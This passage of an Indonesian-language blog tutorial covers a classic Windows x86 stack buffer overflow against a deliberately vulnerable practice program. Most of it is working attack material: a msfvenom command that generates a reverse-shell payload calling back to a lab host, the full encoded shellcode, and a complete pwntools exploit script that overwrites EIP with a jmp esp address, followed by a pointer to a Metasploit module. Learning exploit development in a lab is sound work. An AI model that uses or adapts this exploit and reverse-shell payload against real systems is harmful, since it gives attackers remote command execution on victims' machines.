class="p">(</span><span class="s">"recv: "</span> <span class="o">+</span> <span class="n">data</span><span class="p">)</span> <span class="k">def</span> <span class="nf">kirim</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">payload</span><span class="p">):</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"send: "</span><span class="o">+</span> <span class="n">payload</span><span class="p">)</span> <span class="n">evil</span> <span class="o">=</span> <span class="s">"Aa0Aa1Aa2Aa3... ...Co1Co2Co3Co4Co5Co"</span> <span class="c1">#shorten because it's too long </span><span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s">'192.168.56.103'</span><span class="p">,</span> <span class="mi">31331</span><span class="p">)</span> <span class="n">terima</span><span class="p">(</span><span class="n">p</span><span class="p">)</span> <span class="n">kirim</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">evil</span><span class="p">)</span> </code></pre></div></div> <p>Jalankan script dan cek debugger</p> <p><img src="/blog/images/posts/2018/p1_3.png" alt="EIP" title="EIP terisi dengan pattern" width="600" /></p> <p>Menggunakan mona, kita bisa men-track dan menemukan offset yang meng-overwrite EIP <code class="language-plaintext highlighter-rouge">!mona findmsp</code></p> <p><img src="/blog/images/posts/2018/p1_4.png" alt="mona" title="!mona findmsp" width="600" /></p> <p>Offset EIP berada setelah 1012 byte junk. Kita bisa menyusun payload menjadi <code class="language-plaintext highlighter-rouge">evil = "A"*1012 + "BBBB"</code> dimana <code class="language-plaintext highlighter-rouge">BBBB</code> adalah <code class="language-plaintext highlighter-rouge">alamat dari sesuatu</code>.</p> <p>Pertanyaannya adalah alamat apa yang harus kita letakkan untuk mengganti karakter BBBB? kita bisa meletakkan alamat dimana terdapat instruksi untuk lompat ke register ESP (stack pointer) karena telah kita ketahui bahwa kita dapat menulis apapuhn di dalam stack melalui celah buffer overflow. Nantinya kita akan meletakkan opcode (operation code) agar program mengeksekusinya. Gunakan mona untuk menemukan alamat tersebut, kode assembly untuk lompat ke esp adalah <code class="language-plaintext highlighter-rouge">jmp esp</code>.</p> <p>Ketik <code class="language-plaintext highlighter-rouge">!mona jmp -r esp</code> pada konsol debugger.</p> <p><img src="/blog/images/posts/2018/p1_5.png" alt="mona jmp" title="!mona jmp -r esp" width="600" /></p> <p>Kita menemukan sebuah alamat berisikan opcode yang kita inginkan. Alamat tersebut berada pada <code class="language-plaintext highlighter-rouge">0x133712f0</code> (lihat gambar). Ingat bahwa Intel x86 Assembly itu sistem berbasis little endian sehingga agar saat masuk kedalam memori alamat tidak terbalik, pada script kita harus membaliknya menjadi <code class="language-plaintext highlighter-rouge">\xf0\x12\x37\x13</code>. Dan terimakasih untuk pwntools yang telah menyediakan fungsi untuk meng-handle masalah tersebut, <code class="language-plaintext highlighter-rouge">p32()</code>.</p> <p>payload kita sekarang menjadi <code class="language-plaintext highlighter-rouge">evil = "A"*1012 + p32(0x133712f0) + SHELLCODE</code></p> <h3 id="shellcode">Shellcode</h3> <p>Dengan menggunakan metasploit kita generate shellcode-nya. Shellcode ridak boleh berisikan <code class="language-plaintext highlighter-rouge">badchar</code> (bad charachter). Badchar adalah karakter yang nantinya akan menghentikan program dalam mengeksekusi shellcode kita. Contoh pada program dvca_bof.exe, NULL atau <code class="language-plaintext highlighter-rouge">\x00</code> adalah badchar-nya.</p> <p>Menyusun shellcode menggunakan msfvenom:</p> <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>msfvenom <span class="nt">-p</span> windows/shell_reverse_tcp <span class="nv">LHOST</span><span class="o">=</span>192.168.56.1 <span class="nv">LPORT</span><span class="o">=</span>9876 <span class="nt">-b</span> <span class="s1">'\x00'</span> <span class="nt">-e</span> x86/shikata_ga_nai <span class="nt">-f</span> python Found a database at /Users/fokt/.msf4/db, checking to see <span class="k">if </span>it is started Starting database at /Users/fokt/.msf4/db...success <span class="o">[</span>-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload <span class="o">[</span>-] No <span class="nb">arch </span>selected, selecting <span class="nb">arch</span>: x86 from the payload Found 1 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 351 <span class="o">(</span><span class="nv">iteration</span><span class="o">=</span>0<span class="o">)</span> x86/shikata_ga_nai chosen with final size 351 Payload size: 351 bytes Final size of python file: 1684 bytes buf <span class="o">=</span> <span class="s2">""</span> buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">b8</span><span class="se">\x</span><span class="s2">46</span><span class="se">\x</span><span class="s2">74</span><span class="se">\x</span><span class="s2">2a</span><span class="se">\x</span><span class="s2">7f</span><span class="se">\x</span><span class="s2">d9</span><span class="se">\x</span><span class="s2">d0</span><span class="se">\x</span><span class="s2">d9</span><span class="se">\x</span><span class="s2">74</span><span class="se">\x</span><span class="s2">24</span><span class="se">\x</span><span class="s2">f4</span><span class="se">\x</span><span class="s2">5e</span><span class="se">\x</span><span class="s2">33"</span> buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">c9</span><span class="se">\x</span><span class="s2">b1</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">46</span><span class="se">\x</span><span class="s2">12</span><span class="se">\x</span><span class="s2">03</span><span class="se">\x</span><span class="s2">46</span><span class="se">\x</span><span class="s2">12</span><span class="se">\x</span><span class="s2">83</span><span class="se">\x</span><span class="s2">80</span><span class="se">\x</span><span class="s2">70</span><span class="se">\x</span><span class="s2">c8"</span> buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">8a</span><span class="se">\x</span><span class="s2">f0</span><span class="se">\x</span><span class="s2">91</span><span class="se">\x</span><span class="s2">8e</span><span class="se">\x</span><span class="s2">75</span><span class="se">\x</span><span class="s2">08</span><span class="se">\x</span><span class="s2">62</span><span class="se">\x</span><span class="s2">ef</span><span class="se">\x</span><span class="s2">fc</span><span class="se">\x</span><span class="s2">ed</span><span class="se">\x</span><span class="s2">53</span><span class="se">\x</span><span class="s2">2f</span><span class="se">\x</span><span class="s2">9a"</span> buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">66</span><span class="se">\x</span><span class="s2">c3</span><span class="se">\x</span><span class="s2">9f</span><span class="se">\x</span><span class="s2">e8</span><span class="se">\x</span><span class="s2">2a</span><span class="se">\x</span><span class="s2">e8</span><span class="se">\x</span><span class="s2">54</span><span class="se">\x</span><span class="s2">bc</span><span class="se">\x</span><span class="s2">de</span><span class="se">\x</span><span class="s2">7b</span><span class="se">\x</span><span class="s2">18</span><span class="se">\x</span><span class="s2">69</span><span class="se">\x</span><span class="s2">d1"</span> buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">cc</span><span class="se">\x</span><span class="s2">97</span><span class="se">\x</span><span class="s2">4f</span><span class="se">\x</span><span class="s2">dc</span><span class="se">\x</span><span class="s2">cd</span><span class="se">\x</span><span class="s2">84</span><span class="se">\x</span><span class="s2">ac</span><span class="se">\x</span><span class="s2">7f</span><span class="se">\x</span><span class="s2">4e</span><span class="se">\x</span><span class="s2">d7</span><span class="se">\x</span><span class="s2">e0</span><span class="se">\x</span><span class="s2">5f</span><span class="se">\x</span><span class="s2">6f"</span> buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">18</span><span class="se">\x</span><span class="s2">f5</span><span class="se">\x</span><span class="s2">9e</span><span class="se">\x</span><span class="s2">a8</span><span class="se">\x</span><span class="s2">45</span><span class="se">\x</span><span class="s2">f4</span><span class="se">\x</span><span class="s2">f2</span><span class="se">\x</span><span class="s2">61</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">ab</span><span class="se">\x</span><span class="s2">e2</span><span class="se">\x</span><span class="s2">06</span><span class="se">\x</span><span class="s2">5f"</span> buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">70</span><span class="se">\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">55</span><span class="se">\x</span><span class="s2">71</span><span class="se">\x</span><span class="s2">f0</span><span class="se">\x</span><span class="s2">6e</span><span class="se">\x</span><span class="s2">2d</span><span class="se">\x</span><span class="s2">70</span><span class="se">\x</span><span class="s2">d1</span><span class="se">\x</span><span class="s2">21</span><span class="se">\x</span><span class="s2">25</span><span class="se">\x</span><span class="s2">2b</span><span class="se">\x</span><span class="s2">f1"</span> buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">c0</span><span class="se">\x</span><span class="s2">ea</span><span class="se">\x</span><span class="s2">47</span><span class="se">\x</span><span class="s2">b8</span><span class="se">\x</span><span class="s2">da</span><span class="se">\x</span><span class="s2">ef</span><span class="se">\x</span><span class="s2">62</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">51</span><span class="se">\x</span><span class="s2">db</span><span class="se">\x</span><span class="s2">19</span><span class="se">\x</span><span class="s2">85</span><span class="se">\x</span><span class="s2">b3"</span> buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">15</span><span class="se">\x</span><span class="s2">e1</span><span class="se">\x</span><span class="s2">2a</span><span class="se">\x</span><span class="s2">fa</span><span class="se">\x</span><span class="s2">99</span><span class="se">\x</span><span class="s2">10</span><span class="se">\x</span><span class="s2">32</span><span class="se">\x</span><span class="s2">3b</span><span class="se">\x</span><span class="s2">1d</span><span class="se">\x</span><span class="s2">cb</span><span class="se">\x</span><span class="s2">41</span><span class="se">\x</span><span class="s2">35</span><span class="se">\x</span><span class="s2">5d"</span> buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">76</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">82</span><span class="se">\x</span><span class="s2">1f</span><span class="se">\x</span><span class="s2">ac</span><span class="se">\x</span><span class="s2">d7</span><span class="se">\x</span><span class="s2">10</span><span class="se">\x</span><span class="s2">87</span><span class="se">\x</span><span class="s2">27</span><span class="se">\x</span><span class="s2">4f</span><span class="se">\x</span><span class="s2">fc</span><span class="se">\x</span><span class="s2">39</span><span class="se">\x</span><span class="s2">eb"</span> buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">16</span><span class="se">\x</span><span class="s2">77</span><span class="se">\x</span><span class="s2">35</span><span class="se">\x</span><span class="s2">40</span><span class="se">\x</span><span class="s2">5c</span><span class="se">\x</span><span class="s2">df</span><span class="se">\x</span><span class="s2">5a</span><span class="se">\x</span><span class="s2">57</span><span class="se">\x</span><span class="s2">b1</span><span class="se">\x</span><span class="s2">54</span><span class="se">\x</span><span class="s2">66</span><span class="se">\x</span><span class="s2">dc</span><span class="se">\x</span><span class="s2">34"</span> buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">ba</span><span class="se">\x</span><span class="s2">ee</span><span class="se">\x</span><span class="s2">a6</span><span class="se">\x</span><span class="s2">12</span><span class="se">\x</span><span class="s2">1e</span><span class="se">\x</span><span class="s2">aa</span><span class="se">\x</span><span class="s2">7d</span><span class="se">\x</span><span class="s2">3a</span><span class="se">\x</span><span class="s2">07</span><span class="se">\x</span><span class="s2">16</span><span class="se">\x</span><span class="s2">d3</span><span class="se">\x</span><span class="s2">43</span><span class="se">\x</span><span class="s2">57"</span> buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">f9</span><span class="se">\x</span><span class="s2">8c</span><span class="se">\x</span><span class="s2">e1</span><span class="se">\x</span><span class="s2">1c</span><span class="se">\x</span><span class="s2">14</span><span class="se">\x</span><span class="s2">d8</span><span class="se">\x</span><span class="s2">9b</span><span class="se">\x</span><span class="s2">7f</span><span class="se">\x</span><span class="s2">71</span><span class="se">\x</span><span class="s2">2d</span><span class="se">\x</span><span class="s2">96</span><span class="se">\x</span><span class="s2">7f</span><span class="se">\x</span><span class="s2">81"</span> buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">39</span><span class="se">\x</span><span class="s2">a1</span><span class="se">\x</span><span class="s2">0c</span><span class="se">\x</span><span class="s2">b3</span><span class="se">\x</span><span class="s2">e6</span><span class="se">\x</span><span class="s2">19</span><span class="se">\x</span><span class="s2">9a</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">6f</span><span class="se">\x</span><span class="s2">84</span><span class="se">\x</span><span class="s2">5d</span><span class="se">\x</span><span class="s2">ff</span><span class="se">\x</span><span class="s2">45"</span> buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">70</span><span class="se">\x</span><span class="s2">f1</span><span class="se">\x</span><span class="s2">fe</span><span class="se">\x</span><span class="s2">65</span><span class="se">\x</span><span class="s2">81</span><span class="se">\x</span><span class="s2">d8</span><span class="se">\x</span><span class="s2">c4</span><span class="se">\x</span><span class="s2">32</span><span class="se">\x</span><span class="s2">d1</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">ec</span><span class="se">\x</span><span class="s2">3a</span><span class="se">\x</span><span class="s2">ba"</span> buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">82</span><span class="se">\x</span><span class="s2">11</span><span class="se">\x</span><span class="s2">ef</span><span class="se">\x</span><span class="s2">6d</span><span class="se">\x</span><span class="s2">d2</span><span class="se">\x</span><span class="s2">bd</span><span class="se">\x</span><span class="s2">40</span><span class="se">\x</span><span class="s2">ce</span><span class="se">\x</span><span class="s2">82</span><span class="se">\x</span><span class="s2">7d</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">a6</span><span class="se">\x</span><span class="s2">c8"</span> buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">71</span><span class="se">\x</span><span class="s2">6e</span><span class="se">\x</span><span class="s2">d6</span><span class="se">\x</span><span class="s2">f3</span><span class="se">\x</span><span class="s2">5b</span><span class="se">\x</span><span class="s2">07</span><span class="se">\x</span><span class="s2">7d</span><span class="se">\x</span><span class="s2">0e</span><span class="se">\x</span><span class="s2">0c</span><span class="se">\x</span><span class="s2">e8</span><span class="se">\x</span><span class="s2">2a</span><span class="se">\x</span><span class="s2">28</span><span class="se">\x</span><span class="s2">cd"</span> buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">80</span><span class="se">\x</span><span class="s2">28</span><span class="se">\x</span><span class="s2">48</span><span class="se">\x</span><span class="s2">eb</span><span class="se">\x</span><span class="s2">c4</span><span class="se">\x</span><span class="s2">a4</span><span class="se">\x</span><span class="s2">ae</span><span class="se">\x</span><span class="s2">99</span><span class="se">\x</span><span class="s2">f4</span><span class="se">\x</span><span class="s2">e0</span><span class="se">\x</span><span class="s2">79</span><span class="se">\x</span><span class="s2">36</span><span class="se">\x</span><span class="s2">6c"</span> buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">a9</span><span class="se">\x</span><span class="s2">f1</span><span class="se">\x</span><span class="s2">a7</span><span class="se">\x</span><span class="s2">71</span><span class="se">\x</span><span class="s2">67</span><span class="se">\x</span><span class="s2">7c</span><span class="se">\x</span><span class="s2">e7</span><span class="se">\x</span><span class="s2">fa</span><span class="se">\x</span><span class="s2">84</span><span class="se">\x</span><span class="s2">81</span><span class="se">\x</span><span class="s2">a6</span><span class="se">\x</span><span class="s2">0a</span><span class="se">\x</span><span class="s2">e0"</span> buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">91</span><span class="se">\x</span><span class="s2">5f</span><span class="se">\x</span><span class="s2">fb</span><span class="se">\x</span><span class="s2">bf</span><span class="se">\x</span><span class="s2">cb</span><span class="se">\x</span><span class="s2">f6</span><span class="se">\x</span><span class="s2">04</span><span class="se">\x</span><span class="s2">6a</span><span class="se">\x</span><span class="s2">63</span><span class="se">\x</span><span class="s2">94</span><span class="se">\x</span><span class="s2">97</span><span class="se">\x</span><span class="s2">f1</span><span class="se">\x</span><span class="s2">73"</span> buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">d3</span><span class="se">\x</span><span class="s2">8b</span><span class="se">\x</span><span class="s2">ad</span><span class="se">\x</span><span class="s2">24</span><span class="se">\x</span><span class="s2">b4</span><span class="se">\x</span><span class="s2">7a</span><span class="se">\x</span><span class="s2">a4</span><span class="se">\x</span><span class="s2">a0</span><span class="se">\x</span><span class="s2">28</span><span class="se">\x</span><span class="s2">24</span><span class="se">\x</span><span class="s2">1e</span><span class="se">\x</span><span class="s2">d6</span><span class="se">\x</span><span class="s2">b0"</span> buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">b0</span><span class="se">\x</span><span class="s2">59</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">6f</span><span class="se">\x</span><span class="s2">01</span><span class="se">\x</span><span class="s2">67</span><span class="se">\x</span><span class="s2">5b</span><span class="se">\x</span><span class="s2">e2</span><span class="se">\x</span><span class="s2">3d</span><span class="se">\x</span><span class="s2">43</span><span class="se">\x</span><span class="s2">4b</span><span class="se">\x</span><span class="s2">3a</span><span class="se">\x</span><span class="s2">bd"</span> buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">cf</span><span class="se">\x</span><span class="s2">3f</span><span class="se">\x</span><span class="s2">92</span><span class="se">\x</span><span class="s2">e8</span><span class="se">\x</span><span class="s2">99</span><span class="se">\x</span><span class="s2">e9</span><span class="se">\x</span><span class="s2">54</span><span class="se">\x</span><span class="s2">43</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">43</span><span class="se">\x</span><span class="s2">0f</span><span class="se">\x</span><span class="s2">38</span><span class="se">\x</span><span class="s2">22"</span> buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">03</span><span class="se">\x</span><span class="s2">d6</span><span class="se">\x</span><span class="s2">72</span><span class="se">\x</span><span class="s2">f5</span><span class="se">\x</span><span class="s2">55</span><span class="se">\x</span><span class="s2">d7</span><span class="se">\x</span><span class="s2">5e</span><span class="se">\x</span><span class="s2">83</span><span class="se">\x</span><span class="s2">b9</span><span class="se">\x</span><span class="s2">66</span><span class="se">\x</span><span class="s2">37</span><span class="se">\x</span><span class="s2">d2</span><span class="se">\x</span><span class="s2">c6"</span> buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">47</span><span class="se">\x</span><span class="s2">df</span><span class="se">\x</span><span class="s2">d2</span><span class="se">\x</span><span class="s2">bf</span><span class="se">\x</span><span class="s2">b5</span><span class="se">\x</span><span class="s2">7f</span><span class="se">\x</span><span class="s2">1c</span><span class="se">\x</span><span class="s2">6a</span><span class="se">\x</span><span class="s2">7e</span><span class="se">\x</span><span class="s2">8f</span><span class="se">\x</span><span class="s2">57</span><span class="se">\x</span><span class="s2">36</span><span class="se">\x</span><span class="s2">d7"</span> buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">18</span><span class="se">\x</span><span class="s2">3e</span><span class="se">\x</span><span class="s2">a3</span><span class="se">\x</span><span class="s2">65</span><span class="se">\x</span><span class="s2">45</span><span class="se">\x</span><span class="s2">c1</span><span class="se">\x</span><span class="s2">1e</span><span class="se">\x</span><span class="s2">a9</span><span class="se">\x</span><span class="s2">70</span><span class="se">\x</span><span class="s2">42</span><span class="se">\x</span><span class="s2">aa</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">87"</span> buf +<span class="o">=</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">5a</span><span class="se">\x</span><span class="s2">df</span><span class="se">\x</span><span class="s2">57</span><span class="se">\x</span><span class="s2">c3</span><span class="se">\x</span><span class="s2">dc</span><span class="se">\x</span><span class="s2">0c</span><span class="se">\x</span><span class="s2">2a</span><span class="se">\x</span><span class="s2">5c</span><span class="se">\x</span><span class="s2">89</span><span class="se">\x</span><span class="s2">32</span><span class="se">\x</span><span class="s2">99</span><span class="se">\x</span><span class="s2">5d</span><span class="se">\x</span><span class="s2">98"</span> </code></pre></div></div> <p>script exploit final</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#dvca_bofexploit.py #!/usr/local/bin/python </span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="k">def</span> <span class="nf">terima</span><span class="p">(</span><span class="n">p</span><span class="p">):</span> <span class="n">data</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"recv: "</span> <span class="o">+</span> <span class="n">data</span><span class="p">)</span> <span class="k">def</span> <span class="nf">kirim</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">payload</span><span class="p">):</span> <span class="n">p</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"send: "</span><span class="o">+</span> <span class="n">payload</span><span class="p">)</span> <span class="n">buf</span> <span class="o">=</span> <span class="s">""</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\xb8\x46\x74\x2a\x7f\xd9\xd0\xd9\x74\x24\xf4\x5e\x33</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\xc9\xb1\x52\x31\x46\x12\x03\x46\x12\x83\x80\x70\xc8</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x8a\xf0\x91\x8e\x75\x08\x62\xef\xfc\xed\x53\x2f\x9a</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x66\xc3\x9f\xe8\x2a\xe8\x54\xbc\xde\x7b\x18\x69\xd1</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\xcc\x97\x4f\xdc\xcd\x84\xac\x7f\x4e\xd7\xe0\x5f\x6f</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x18\xf5\x9e\xa8\x45\xf4\xf2\x61\x01\xab\xe2\x06\x5f</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x70\x89\x55\x71\xf0\x6e\x2d\x70\xd1\x21\x25\x2b\xf1</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\xc0\xea\x47\xb8\xda\xef\x62\x72\x51\xdb\x19\x85\xb3</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x15\xe1\x2a\xfa\x99\x10\x32\x3b\x1d\xcb\x41\x35\x5d</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x76\x52\x82\x1f\xac\xd7\x10\x87\x27\x4f\xfc\x39\xeb</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x16\x77\x35\x40\x5c\xdf\x5a\x57\xb1\x54\x66\xdc\x34</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\xba\xee\xa6\x12\x1e\xaa\x7d\x3a\x07\x16\xd3\x43\x57</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\xf9\x8c\xe1\x1c\x14\xd8\x9b\x7f\x71\x2d\x96\x7f\x81</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x39\xa1\x0c\xb3\xe6\x19\x9a\xff\x6f\x84\x5d\xff\x45</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x70\xf1\xfe\x65\x81\xd8\xc4\x32\xd1\x72\xec\x3a\xba</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x82\x11\xef\x6d\xd2\xbd\x40\xce\x82\x7d\x31\xa6\xc8</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x71\x6e\xd6\xf3\x5b\x07\x7d\x0e\x0c\xe8\x2a\x28\xcd</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x80\x28\x48\xeb\xc4\xa4\xae\x99\xf4\xe0\x79\x36\x6c</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\xa9\xf1\xa7\x71\x67\x7c\xe7\xfa\x84\x81\xa6\x0a\xe0</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x91\x5f\xfb\xbf\xcb\xf6\x04\x6a\x63\x94\x97\xf1\x73</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\xd3\x8b\xad\x24\xb4\x7a\xa4\xa0\x28\x24\x1e\xd6\xb0</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\xb0\x59\x52\x6f\x01\x67\x5b\xe2\x3d\x43\x4b\x3a\xbd</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\xcf\x3f\x92\xe8\x99\xe9\x54\x43\x68\x43\x0f\x38\x22</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x03\xd6\x72\xf5\x55\xd7\x5e\x83\xb9\x66\x37\xd2\xc6</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x47\xdf\xd2\xbf\xb5\x7f\x1c\x6a\x7e\x8f\x57\x36\xd7</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x18\x3e\xa3\x65\x45\xc1\x1e\xa9\x70\x42\xaa\x52\x87</span><span class="s">"</span> <span class="n">buf</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\x5a\xdf\x57\xc3\xdc\x0c\x2a\x5c\x89\x32\x99\x5d\x98</span><span class="s">"</span> <span class="n">jesp</span> <span class="o">=</span> <span class="mh">0x133712f0</span> <span class="n">evil</span> <span class="o">=</span> <span class="s">"A"</span><span class="o">*</span><span class="mi">1012</span> <span class="o">+</span> <span class="n">p32</span><span class="p">(</span><span class="n">jesp</span><span class="p">)</span> <span class="o">+</span> <span class="s">"</span><span class="se">\x90</span><span class="s">"</span><span class="o">*</span><span class="mi">10</span> <span class="o">+</span> <span class="n">buf</span> <span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s">'192.168.56.103'</span><span class="p">,</span> <span class="mi">31331</span><span class="p">)</span> <span class="n">terima</span><span class="p">(</span><span class="n">p</span><span class="p">)</span> <span class="n">kirim</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">evil</span><span class="p">)</span> </code></pre></div></div> <p><code class="language-plaintext highlighter-rouge">\x90</code> adalah opcode dari NOP, artinya No Operation sampai menemukan opcode lain. Setelah menyusun script exploit meaning No Operation until find other opcode. Setelah exploit selesai, jalankan msfconsole.</p> <p><img src="/blog/images/posts/2018/p1_6.png" alt="msfconsole" title="msfconsole" width="600" /></p> <p>Jalankan script eksploit dan kita mendapatkan shell.</p> <p><img src="/blog/images/posts/2018/p1_7.png" alt="shell" title="shell" width="600" /></p> <h3 id="metasploit-module">Metasploit module</h3> <p>Untuk membuat script exploit menjadi portabel, kita bisa membuatnya menjadi modul metasploit sehingga metasploit dapat mengeksploitasinya secara otomatis. Saya telah membuat modul tersebut yang dapat anda lihat pada link berikut.</p> <p><a href="https://github.com/fachrioktavian/DVCA/blob/master/ClassicBufferOverflow/cbof.rb">exploit/windows/DVCA/cbof.rb</a></p> <p>Letakkan script tersebut pada direktori <code class="language-plaintext highlighter-rouge">$MSF_PATH/embedded/framework/modules/exploit/windows/DVCA/</code> (path relatif tergantung instalasi).</p> <p>Dan gunakan modul tersebut pada metasploit</p> <p><img src="/blog/images/posts/2018/p1_8.png" alt="msfconsole" title="modul exploit msfconsole" /></p> Wed, 01 Aug 2018 02:38:50 +0000 https://fachrioktavian.github.io//blog/research/win32-classic-buffer-overflow/ https://fachrioktavian.github.io//blog/research/win32-classic-buffer-overflow/ windows x86 stack buffer overflow research